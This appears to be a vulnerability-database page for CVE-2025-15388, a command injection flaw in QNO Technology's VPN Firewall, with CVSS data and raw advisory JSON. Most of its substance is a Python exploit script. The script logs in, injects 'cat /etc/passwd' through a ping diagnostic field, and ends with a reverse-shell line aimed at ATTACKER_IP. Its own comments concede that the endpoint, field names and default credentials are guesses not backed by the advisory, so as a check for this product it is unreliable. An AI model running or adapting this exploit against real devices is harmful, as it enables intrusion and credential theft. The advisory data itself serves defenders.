Security Vulnerability Report
CVE-2025-15388 CVSS 8.8 HIGH

CVE-2025-15388

Published: 2025-12-31 09:15:51
Last Modified: 2026-04-15 00:35:42

Description

VPN Firewall developed by QNO Technology has an OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

QNO VPN Firewall (all versions prior to the vendor's patch; no fixed version is listed on this page)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
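import requests
import sys

# CVE-2025-15388 PoC - QNO VPN Firewall OS Command Injection
# Authenticated RCE via command injection
#
# NOTE(review): the advisory text on this page only states that an
# authenticated OS command injection (CWE-78) exists in the product. It does
# not name the vulnerable endpoint or parameter, so the '/login' and
# '/diagnostic/ping' paths and the form field names used below are not
# corroborated by it. Read this script as an illustration of the bug class,
# not as a verified check for a particular device or firmware.

# Positional arguments: base URL, username, password. The fallbacks are the
# script's own placeholders; the advisory does not mention default credentials.
target = sys.argv[1] if len(sys.argv) > 1 else 'http://target:8080'
username = sys.argv[2] if len(sys.argv) > 2 else 'admin'
password = sys.argv[3] if len(sys.argv) > 3 else 'admin'

# One Session so cookies set by the login response are reused afterwards.
session = requests.Session()

# Step 1: Login to obtain authenticated session
login_url = f'{target}/login'
login_data = {
    'username': username,
    'password': password
}

try:
    response = session.post(login_url, data=login_data, timeout=10)
    # Only the HTTP status is reported; it does not establish that the
    # credentials were accepted (a rejected login can also return 200).
    print(f'[+] Login attempt completed, status: {response.status_code}')
except requests.RequestException as e:
    print(f'[-] Login failed: {e}')
    sys.exit(1)

# Step 2: Exploit command injection via ping/diagnostic function
# Payload: inject arbitrary command after target IP
#
# The ';' separator only has an effect if the server hands this field to a
# shell without validation. For this bug class the server-side fix is to
# validate the field strictly as an address and to invoke the utility without
# a shell; on the detection side, shell metacharacters in diagnostic form
# fields are a useful signal when reviewing management-interface logs.
inject_url = f'{target}/diagnostic/ping'
inject_data = {
    'target': '127.0.0.1; cat /etc/passwd',
    'count': '1'
}

try:
    response = session.post(inject_url, data=inject_data, timeout=10)
    print('[+] Command injection payload sent')
    if 'root:' in response.text:
        # The marker is the only evidence that the injected command ran, and
        # even then the output needs to be read by a person.
        print('[+] Potential RCE confirmed - check response for command output')
        print(response.text[:500])
    elif response.status_code == 200:
        # The original treated any HTTP 200 as confirmation, which reports a
        # finding for every page that merely loads. Show the excerpt for
        # manual review without claiming a result.
        print('[-] HTTP 200 but no command output marker in response, manual verification needed')
        print(response.text[:500])
    else:
        print('[-] No obvious response, manual verification needed')
except requests.RequestException as e:
    print(f'[-] Exploit request failed: {e}')

# Step 3: Reverse shell payload (for demonstration)
# Attacker would typically use: ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1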

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15388", "sourceIdentifier": "[email protected]", "published": "2025-12-31T09:15:50.657", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "VPN Firewall developed by QNO Technology has an OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server."}, {"lang": "es", "value": "Cortafuegos VPN desarrollado por QNO Technology tiene una vulnerabilidad de inyección de comandos del sistema operativo, permitiendo a atacantes remotos autenticados inyectar comandos arbitrarios del sistema operativo y ejecutarlos en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10614-dee41-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10613-e1780-1.html", "source": "[email protected]"}]}}